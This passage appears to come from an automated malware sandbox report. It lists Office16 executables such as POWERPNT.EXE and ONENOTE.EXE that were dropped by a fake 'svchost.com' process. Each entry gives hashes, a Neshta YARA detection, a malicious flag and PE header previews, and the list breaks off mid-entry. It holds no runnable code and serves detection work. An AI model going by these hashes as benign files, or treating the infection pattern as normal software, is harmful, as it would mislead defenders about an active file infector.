                                                                                                                        SHA-256:BAE7AFCEBAEF2A3BB243EFAF1305AED127D21B978D7C4335109F2A403A4C2CE1
                                                                                                                        SHA-512:C90A74241A93652AB10BD6E1D476D89C995C7749938B83877C14A8F9496959C8868F21239DC6C468629852D154621E310CA76FB4C50DF8C02626560D48F96E07
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Microsoft Office\Office16\AppSharingHookController.exe, Author: Florian Roth
                                                                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                                                                        C:\Program Files (x86)\Microsoft Office\Office16\CLVIEW.EXE
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.448388258977007
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:768:eyxqjQl/EMQt4Oei7RwsHxyP7nbxzOQdJZyKcXJKtm61b0fth1uvh/NYANLOT9j/:JxqjQ+P04wsmJCRXJQm62t+vTaT9jxd7
                                                                                                                        MD5:8BA32D4C4C59A22D2A5A1BEAB8B004C7
                                                                                                                        SHA1:AA91417C5BA67F09E743A7740662EED65C4873EA
                                                                                                                        SHA-256:2B0E0FBC461BED861EAF961F5058A18252A8A517008660D46063A1DCDF10DD02
                                                                                                                        SHA-512:07B9A4827EFDE249FBD6953ABE3559A589500534E8DBAFF12C65EAD40FDE51395822BD265AE48D271ECB825BF6EDEC3D7CB7D2D96FFCBB3AA167FF7FC1A64AF4
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Microsoft Office\Office16\CLVIEW.EXE, Author: Florian Roth
                                                                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                                                                        C:\Program Files (x86)\Microsoft Office\Office16\CNFNOT32.EXE
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.285196024262785
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJCVJQEW8SSfaU/VEwdwzfnuktR9KJMkW:sr85CbQE2SkXFKJMt
                                                                                                                        MD5:2355BC5DCE8E63203BD523F6A3EF11C9
                                                                                                                        SHA1:06E09B957EC99F2635D39BD9D3EF6FB8C26FDD8F
                                                                                                                        SHA-256:37D5B62049B2ECBAC53E3126E68E2FA0416A2E220C97E9951BD71FFF52E514A9
                                                                                                                        SHA-512:71BCE642EDC4355E8CD217442EE6AEB1AA536069FAACA69633EF3B508A6E523FA2386A7EF841FC84F9EAF475725368DCC2CED0C0D4C13B170EE789A69FFDDCD7
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Microsoft Office\Office16\CNFNOT32.EXE, Author: Florian Roth
                                                                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                                                                        C:\Program Files (x86)\Microsoft Office\Office16\DCF\DATABASECOMPARE.EXE
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.72011826313205
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJCa9IKr1BRo+SYZMuIb3eJG53B:sr85CaDr1BRo+SYZMuW32GhB
                                                                                                                        MD5:BD61FF1B20A7530ECF797894EE1316DC
                                                                                                                        SHA1:A9601D8B56C247B801E5D5A89377EEFA6FF37FA2
                                                                                                                        SHA-256:29F10DE4B67C8BF585A581AE8893069FA52214A18CC4444D3E207A7A657EBD02
                                                                                                                        SHA-512:CD91235FF8ACC7D8263EF05028E728E0BBA90D9459B3FD86568C7149DFF55F1E3E010C5234C234DA87B2CBFBE7B8C71DFEDD9E8C5BB326146579CA9EAD90055F
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Microsoft Office\Office16\DCF\DATABASECOMPARE.EXE, Author: Florian Roth
                                                                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                                                                        C:\Program Files (x86)\Microsoft Office\Office16\DCF\SPREADSHEETCOMPARE.EXE
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.169493808225336
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJCslMDFepJnQxbMwwNOhO8WSnWR0Oj:sr85CsaeYyiL7WR0k
                                                                                                                        MD5:8F4A79DC0DD71E8CA092D84C0260F92D
                                                                                                                        SHA1:CEB13BACFAE68CFE94561487FC6E0AE0464C6A58
                                                                                                                        SHA-256:2480D138EE436D182337435EF36F9A895ED9A98DA620C752976D575C08ECD390
                                                                                                                        SHA-512:A100A527B654FE476672B7809A4C73F8C523C2620815476CF8D994E1553A344CFE4191FDF8641719D52B29743D625574A9287EF51BBF343B5D8FDD428FE68D33
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Microsoft Office\Office16\DCF\SPREADSHEETCOMPARE.EXE, Author: Florian Roth
                                                                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                                                                        C:\Program Files (x86)\Microsoft Office\Office16\DCF\filecompare.exe
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.3186383734960625
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJCDnCgs1pSd8MvYMRLWjqov/M:sr85CD+4DFLWjlXM
                                                                                                                        MD5:B4F5C898517A6B40402611BF65397423
                                                                                                                        SHA1:F6E1F64CA7C05131682153B67E5EF5C54533F1DE
                                                                                                                        SHA-256:E634A7EECA5A30B359DD622BA3A3BDBF5729173A416C86C962647B2B7A1F286C
                                                                                                                        SHA-512:C510990B72E1FCD1007B38B0A9F4A28280E909D2AC81AE08F106EC482423927EE13081B89DA316D44EDC6FF684C3C3FB93E898705D6D7E7640612560C494E5CA
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Microsoft Office\Office16\DCF\filecompare.exe, Author: Florian Roth
                                                                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                                                                        C:\Program Files (x86)\Microsoft Office\Office16\FIRSTRUN.EXE
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.392056642854633
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJCjCTi/Y5cIzwdi9Jo5wJ8RNjRmBF2XFAkrfkGj:sr85CGT/5Lz8RNIBAXFdrtj
                                                                                                                        MD5:77E4E96AC817B6D2DCC671C75B3AF7D5
                                                                                                                        SHA1:2B3C254A156F9CD60BD9EF5B5832C7BC8F7FF9E2
                                                                                                                        SHA-256:657B05CB38BED57B93383818722F9058FED9966D1CDA1AB5A00034CB0F6E9A0B
                                                                                                                        SHA-512:F4F835B4004C5BF7C7ECB7DF6179EEF8DDDF277B13609A4ABE5AF4A748AD27A6207020E6A9E5301C89C0FF689CFCD99234245BB621CCC94A3E2A9B930DA63B0F
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Microsoft Office\Office16\FIRSTRUN.EXE, Author: Florian Roth
                                                                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                                                                        C:\Program Files (x86)\Microsoft Office\Office16\GRAPH.EXE
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.496755886640026
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJCJ5SSe4emv59S7OJvwgUQn73bPrI3SZ:sr85CJte4eK58i6gUQ7LL
                                                                                                                        MD5:C5ECA751B54F507CCB797556E24D9EDA
                                                                                                                        SHA1:30949D80A7FC4778ACCD14FA9A35B3910F0C96D2
                                                                                                                        SHA-256:8F2BF3E7F90A0A85C2B121E448BF1C0BD8B5C8B860E64C1ABF64DBBA8C20111C
                                                                                                                        SHA-512:AD1B5E374C615E92EFFD6E789BCFEB99D7DBECBCBB4DA4ABF013DE911E5BA8B6B14F836836EA8EC949F1652ABB29A32204FF5B9BF843C85ACC1453DCAB162C64
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Microsoft Office\Office16\GRAPH.EXE, Author: Florian Roth
                                                                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                                                                        C:\Program Files (x86)\Microsoft Office\Office16\IEContentService.exe
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.268163712816429
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJCdi4v7jFil6gu4ayPdTTFDiopJLN:sr85Cc4vHFs6gu4aCdPFDi2
                                                                                                                        MD5:1EF797E5E199041B8A0EB41A50E73185
                                                                                                                        SHA1:2D059C707E2738DD623FF8E4D336D8B90B482451
                                                                                                                        SHA-256:0BB888F08C57AD222A544EB3A73478B4747059277A80F21A03E5655FA21CE119
                                                                                                                        SHA-512:3B08845C01002AF7B35A5BCDCA1D984D7D019EE117F0CB761E3DA608329314067DA1A16ABEBC8AA3FCB602EC58EA77D0F1EE3FC288142DDD0F44970BF431BC77
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Microsoft Office\Office16\IEContentService.exe, Author: Florian Roth
                                                                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                                                                        C:\Program Files (x86)\Microsoft Office\Office16\MSOHTMED.EXE
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.201681837230837
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJCpSsTITDBkt+ETGBaORneubkuJ:sr85C7IvibTCaOFeubks
                                                                                                                        MD5:D528E65D0A3CFF610803965BAB5D42EE
                                                                                                                        SHA1:A01448DD0C03BAF9B1E287BCB87A58450084BFFA
                                                                                                                        SHA-256:C82DAD16438E79EE2ABC34D1B405F09DE3844FDEF99F9115B58E7D1F7C90C4E9
                                                                                                                        SHA-512:4A0C3C8F49CE25A4D5D06359683DE444EDFC6B49E09323D10F675E5029D584135A80F89A04FE77CB58D4B9BC6522F7E2DC359FC8D6EB8A55F981AB4CC07B91F3
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOHTMED.EXE, Author: Florian Roth
                                                                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                                                                        C:\Program Files (x86)\Microsoft Office\Office16\MSOSREC.EXE
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.352529349012904
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJCkb7zbeu8L16Ytx2XaRSX2qA4i:sr85Ckb7Heu8LSakmP
                                                                                                                        MD5:2249CAFC0B359EA41F137AB87DC151FA
                                                                                                                        SHA1:DABA42EFF4B9D3251E409CFD98A2BD3B9A672ED3
                                                                                                                        SHA-256:3478297533C741CBF62D8FA8F2D820089E3777EBFD6DCDAD50F8FBCF93FB6304
                                                                                                                        SHA-512:D0684A20BD7449D97323DBBE93467148F7E63DB79EC1BD3AC2E90D1350148EDF6F31E7BBEE1F32773D169CD04E1D11FEF03AE2E2C5637A89288FFB08C8115DB5
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSREC.EXE, Author: Florian Roth
                                                                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                                                                        C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.46773744909196
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJCxvuAvYalUpgotzYIlHkHwt7//Qt:sr85CqaBotvHkHwK
                                                                                                                        MD5:F3279F5053B3112B5299C08136AE58E9
                                                                                                                        SHA1:5B4C8EA82DC1E296CB31EC7B439B8B6E52795995
                                                                                                                        SHA-256:1A1E7090747C3F600989939E12DA73BD2E85FFCAD10159E7AC52D374DA11874A
                                                                                                                        SHA-512:86A355429C9358EEC0FE6B95623DC26FE7879684CDDB6AEAE293276FC5D604CC37DE64FC520F0EE749A3F6A15E9D5FB53852F9B444A0B3DE1374077578A99564
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE, Author: Florian Roth
                                                                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                                                                        C:\Program Files (x86)\Microsoft Office\Office16\MSOUC.EXE
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.4135504331115705
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJCC+MHzv1nArfoWBgJCSTgHyyf:sr85CDuv1nqQ2zSESy
                                                                                                                        MD5:A937F48D8198AB59DF93A63E834C4AAF
                                                                                                                        SHA1:4DA8ED9F7A886A8437562470A199744DF6E88F24
                                                                                                                        SHA-256:CA2CA4A45AB550D894AA4B16919FF38ABB7784E532C327891DF71645AB845C6A
                                                                                                                        SHA-512:490CDFC2D7AAF7142889398D70DE668CCCD8D4A52AF7C5FA9D64540CE2740F09A481293F4DFFED1ECCED9827148313D2296CC9BFC9716A88814544930C9DE551
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOUC.EXE, Author: Florian Roth
                                                                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                                                                        C:\Program Files (x86)\Microsoft Office\Office16\MSQRY32.EXE
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.344917752925491
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJCDt+pejhS5enb1o24/tmIY514oZFt4s:sr85CDt+pGQ5E1o24VmIYX4oZP4s
                                                                                                                        MD5:EA546BBE947027BA147DE2719F53D051
                                                                                                                        SHA1:38B150F5A8BE8E19B5D1F2824F8EDE784DE2C6E6
                                                                                                                        SHA-256:930F29A1D4152D23CB5F1E60693191F2865F56EA5474BF720BDC286D518CD9C1
                                                                                                                        SHA-512:D456962B5511F76AF309345C22FCB20EDB120CF4EC3388300FEE1864B13859C605C40B6E86357E698DACA5AED60F56B59DFF1655E3059A9065B9550A7A3C9E1E
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Microsoft Office\Office16\MSQRY32.EXE, Author: Florian Roth
                                                                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                                                                        C:\Program Files (x86)\Microsoft Office\Office16\NAMECONTROLSERVER.EXE
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.464347380493513
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJCSGNDd85lS8adLs4XK9OtiRk+7mLpNKahE:sr85C9NDS5lS8D0K8tMk+7ms
                                                                                                                        MD5:072EDD1A5D3A99C26EA9987890989B31
                                                                                                                        SHA1:6ECC5A3EBEB7EC6EEBBEF28CEB67079A92F57107
                                                                                                                        SHA-256:598CA2D9EB855C5D53C9C19374AFFAAE2E4A6A9C9EBF1F46D2B025B5BD8731B4
                                                                                                                        SHA-512:D11D018159148C9926450A3047B207484D1B31B80BB975B435D6E0FEB497F60625450273C1D834FFAD74C7C581A80224898FDCDC41BB9D3BD799E70AE8EF838E
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Microsoft Office\Office16\NAMECONTROLSERVER.EXE, Author: Florian Roth
                                                                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                                                                        C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.4498443082331764
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJCLddbrls2itD1NrBOTe5IfY2X36Be:sr85CjbO1OTqcX36Be
                                                                                                                        MD5:187B658322698CB74D48476EB2ECB171
                                                                                                                        SHA1:3C4371425F833F6C7643E09BEBA5762B67081611
                                                                                                                        SHA-256:7460BB6E5A2E43F3C737730FE5F9FC5E199072C61B870C07FF35207F333EE496
                                                                                                                        SHA-512:3013808486F1445457BC00B919AFDCC46297B3F167A876EE5F028D50456EBE582C05882D99A0E677531C9FD3796F574AD88AB48FBF394A124F425894F841D636
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE, Author: Florian Roth
                                                                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                                                                        C:\Program Files (x86)\Microsoft Office\Office16\ONENOTEM.EXE
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.336782734218808
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJCEbf/h1xmGzUiVZd0p813HmTJhM3:sr85CMfJ1xmzsHmTHM3
                                                                                                                        MD5:A3977FA0A7C20B05EC69FADE4F852D71
                                                                                                                        SHA1:FE2C747F4DA1C5C85C55EB755CA32D59B0B1EC43
                                                                                                                        SHA-256:1F3B9AB4F318C962967E9418DFEEBF251EF610A0ECE5570E166D84B6A730A932
                                                                                                                        SHA-512:CD8082F275380F4CD67BA08904C116E921C428D8D6BD8BF411A93B42CA9276332AB6E7F46EEC05C697662A98CC70841D12AD3EA6A3DE54EB575DE11BF2A0A1B2
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTEM.EXE, Author: Florian Roth
                                                                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                                                                        C:\Program Files (x86)\Microsoft Office\Office16\OcPubMgr.exe
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.531432224892055
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJCN5Ss6w5T7tIc+9KLSifgpM5:sr85CrSsp+9KSM5
                                                                                                                        MD5:A651847108A83A8B2A3B75A66403B0DC
                                                                                                                        SHA1:EA7CFC3C984B676C322578E80DCD78DDA75E5A2C
                                                                                                                        SHA-256:A1616D454E5EE365285A3E03455CED1FD70D8EEB682D47A8379EB08CF801D325
                                                                                                                        SHA-512:0B97CD6F46A4660C27E99F140D07BA7F0F380E32062D5F9AF550C161E0191332EB27A196C5CAEFEB94A091CF9294FFEE91604D0FEF329260F768D9669591E2CE
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Microsoft Office\Office16\OcPubMgr.exe, Author: Florian Roth
                                                                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                                                                        C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXE
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):5.556968630457308
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJCVFFlJhOo/ovdHk4h6zeXVv:sr85CVFFlJhOoGt66F
                                                                                                                        MD5:FB0697C512E65305CF24EFA18EC58086
                                                                                                                        SHA1:B924F5AFE1A14163E20DB2CDCE980017C1461D1E
                                                                                                                        SHA-256:CCA73F1C0206BBB9D6567616808D4BADAFAB7796ED40FC86097032802F2381D3
                                                                                                                        SHA-512:FA3AD9699129E24AEAC778B38EF1B6CEBA11B226E6636635224FCB9019036D9E11726F11F50A9D1D531A8A6F08B5D3A3B650E7416655113284B63412C01B1F60
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXE, Author: Florian Roth
                                                                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                                                                        C:\Program Files (x86)\Microsoft Office\Office16\PPTICO.EXE
